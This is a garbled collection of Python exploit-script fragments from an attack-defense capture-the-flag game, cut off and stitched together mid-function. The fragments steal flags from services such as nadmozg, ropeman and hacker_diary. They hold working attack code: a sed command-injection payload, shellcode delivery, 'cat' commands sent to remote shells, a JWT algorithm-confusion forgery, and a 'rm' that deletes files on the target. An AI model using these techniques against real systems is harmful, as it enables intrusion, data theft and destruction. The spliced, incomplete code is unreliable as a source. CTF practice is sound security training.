sys.path.append('./utilities/')
from utils import sendFlag
from utils import getFlagID
def exploit(ip, port, flag_id):
pwn.context(timeout=10)
dict_id = "".join(random.choice(string.ascii_letters) for i in range(30))
word = "".join(random.choice(string.ascii_letters) for i in range(30))
payload = "{} 0a DELIM s/{}/cat {}/e".format("".join(random.choice(string.ascii_letters) for i in range(30)), word, flag_id)
r = pwn.remote(ip, port)
r.recvline()
r.send("dict {}\n".format(dict_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in payload).encode('hex') + '\n')
r.recvline()
r.send("translate {}\n".format(word))
r.send('quit\n')
r.recvline()
flagline = r.recvline()
flag = re.match("s/secretik/(.*)/gi;", flagline).group(1)
return flag
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: %s <ip>" % os.path.basename(__file__))
sys.exit(1)
else:
print sendFlag(exploit(sys.argv[1], 20067, getFlagID("nadmozg")), "nadmozg")
print c.recv()
def pirate_exploit_id(host, port, flag_id, b):
c = connect(host, port)
sys.stdout.write("Start exploiting")
sys.stdout.flush()
print_pir(c, b)
search_pir(c, "00030000", b)
send_shellcode(c, b)
if (b):
print "pulizia " + c.recv() + c.recv()
else:
c.recv() + c.recv()
c.sendline("cat " + str(flag_id))
time.sleep(0.1)
flag = c.recv()
print flag
print("DONE!!;-)")
return flag
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: %s <ip>" % os.path.basename(__file__)
sys.exit(1)
else:
print sendFlag(
pirate_exploit_id(sys.argv[1], 20038, getFlagID("piratemap"), 0),
"piratemap")
#while buf != 'exit':
buf = buf + "cat /opt/ctf/FHM-Maintenance/rw/doc_root/htpass/*"
sock.sendall("%s\n" % buf)
sock.setblocking(False)
time.sleep(0.1)
try:
f=sock.recv(8192)
#print(f)
submitFlags(f, flag_id)
runCmd(ip, port, "rm /opt/ctf/FHM-Maintenance/rw/doc_root/htpass/*")
f.close()
sys.exit(1)
#buf=""
#time.sleep(10)
except(KeyboardInterrupt):
exit(1)
except:
pass
if __name__ == '__main__':
# parse options
if len(sys.argv) < 2:
print "Usage: %s <ip>" % os.path.basename(__file__)
sys.exit(1)
else:
ip = sys.argv[1]
port = 20111
exploit(ip, port, getFlagID('FHMMaintenance'))
for entry in entries:
if str(entry['id']) == str(flag_id):
target_entry = entry
if not target_entry:
raise Exception("Entry with flag_id is not in the list1")
(header, body, signature) = jwt_token.split('.')
header_decoded = json.loads(base64.b64decode(header).decode())
header_decoded['alg'] = 'HS256'
header_payload = base64.b64encode(json.dumps(header_decoded).encode())
body_decoded = json.loads(base64.b64decode(body).decode())
body_decoded['username'] = target_entry['owner']
body_payload = base64.b64encode(json.dumps(body_decoded).encode())
to_sign = header_payload + b'.' + body_payload
public_key = get_public_key(base_url)
hmac = HMAC.new(public_key.encode(), to_sign, SHA256)
payload_signature = base64.b64encode(hmac.digest())
payload_jwt = to_sign + b'.' + payload_signature
exploit_entry = get_entry(base_url, payload_jwt.decode(), flag_id)
return exploit_entry['entry']
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: %s <ip>" % os.path.basename(__file__))
sys.exit(1)
else:
print sendFlag(exploit(sys.argv[1], 20130, getFlagID("hacker_diary")), "hacker_diary")
sys.exit(1)
#print('********************** ', payld)
#payld += ("cat *")[: 0x3c - len(payld) - 2] + '*\0'
# Execute system('cat flag_id')
#conn.expect(__EXP_REPLAY_MENU__)
conn.sendline(payld)
#conn.expect('\|(FLG.{13})|$')
#flag = conn.match.group(1)
time.sleep(0.1)
data = sock.recv(1024)
init = data.find('}')
end = data.find('***')
data = data[init + 1:end]
print(data)
flags = data.split('|')
return flags[2]
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: %s <ip>" % os.path.basename(__file__)
sys.exit(1)
else:
#print getFlagID("ropeman")
#for i in ropeman_exploit(sys.argv[1], 20129):
# print(sendFlag(i, "ropeman"))
print sendFlag(
ropeman_exploit_id(sys.argv[1], 20129, getFlagID("ropeman")),
"ropeman")
def genRndString():
rang = randint(8, 16)
rndString = ''.join(
random.choice(string.ascii_uppercase + string.digits)
for _ in range(rang))
return rndString
def invalidFlag(ip, port, flag_id):
flag_rnd = genRndString()
password = genRndString()
c = remote(ip, port)
for count in range(0, 4):
c.recvline()
c.sendline("A")
c.recvline()
c.sendline(flag_id)
c.sendline(password)
c.sendline(flag_rnd)
c.recvline()
c.close()
return {"flag_id": flag_id, "token": password}
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: %s <ip>" % os.path.basename(__file__))
sys.exit(1)
else:
print invalidFlag(sys.argv[1], 20066, getFlagID("blackgold"))
#conn.sendline("sh")
#conn.interactive()
str = "cat " + flag_id
#str = "/bin/bash"
print str
#s=conn.sendline("cat {0}".format(flag_id))
conn.sendline(str)
f = conn.recvuntil('\n') # first line in the file is the password
print f
flag = conn.recvuntil('\n').strip() # second line is the flag
return flag
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: %s <ip>" % os.path.basename(__file__))
sys.exit(1)
else:
print sendFlag(exploit(sys.argv[1], 20040, getFlagID("hanoifones")),
"hanoifones")
'''
while(True):
flag_id = getFlagID(HOST, PORT)
flag = exploit(sys.argv[1], sys.argv[2], flag_id)
log.info(flag)
time.sleep(10)
'''
else:
try:
f = sock.recv(8192)
print f.splitlines()[-1]
return f.splitlines()[-1]
except socket.timeout:
pass
if __name__ == '__main__':
# parse options
if len(sys.argv) < 2:
usage()
sys.exit(1)
flag_id = getFlagID('FHMMaintenance')
# cmd = sys.argv[1]
# if cmd == 'help':
# usage()
# sys.exit(0)
# elif cmd == 'shell' and len(sys.argv) >= 4:
# pass
# elif cmd == 'retrieve' and len(sys.argv) >= 5:
# else:
# usage()
# sys.exit(1)
ip = sys.argv[2]
port = 20111